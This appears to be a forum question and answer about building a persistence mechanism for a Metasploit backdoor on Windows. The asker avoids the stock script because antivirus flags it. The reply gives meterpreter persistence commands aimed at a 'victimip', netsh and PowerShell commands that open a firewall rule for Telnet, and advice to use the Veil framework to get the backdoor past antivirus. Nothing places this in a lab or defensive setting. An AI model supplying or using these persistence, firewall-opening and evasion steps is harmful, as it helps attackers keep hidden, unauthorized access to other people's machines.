I am trying to design a simple persistence script for Metasploit, considering the one they have is tagged by antivirus. I'm running into some trouble about what the code should look like. Here's my plan:

1. Batch file in startup folder with a loop function
2. Said batch file does a tasklist command and searches for the name of the file on the running processes
3. If it finds the process running it does nothing
4. If it does not see the process running, it simply starts it again

It is a very simple design but I am running into trouble when I am writing the code. My question is: How do I write this idea into a command? The idea being how the if statement factors into the tasklist command. So I need the tasklist command to be filtered to see if the process is running based on the name, and then I need to set the output of the tasklist command as a variable so that I can write the if statement: if %process%==Client.exe (goto yes)
Metasploit ships with default auxiliary modules. In your scenario, you can execute
run metsvc
over meterpreter, or
run persistence -U -i <interactive seconds> -p portnumber -r victimip
You can also create a rule using netsh:
netsh advfirewall firewall add rule name="Allow Inbound Telnet" dir=in program=%SystemRoot%\System32\tlntsvr.exe remoteip=localsubnet action=allow
Using PowerShell:
New-NetFirewallRule -DisplayName "Allow Inbound Telnet" -Direction Inbound -Program "$env:SystemRoot\System32\tlntsvr.exe" -RemoteAddress LocalSubnet -Action Allow
If any AV is detecting your backdoor, please use the Veil framework.
Mr.Geek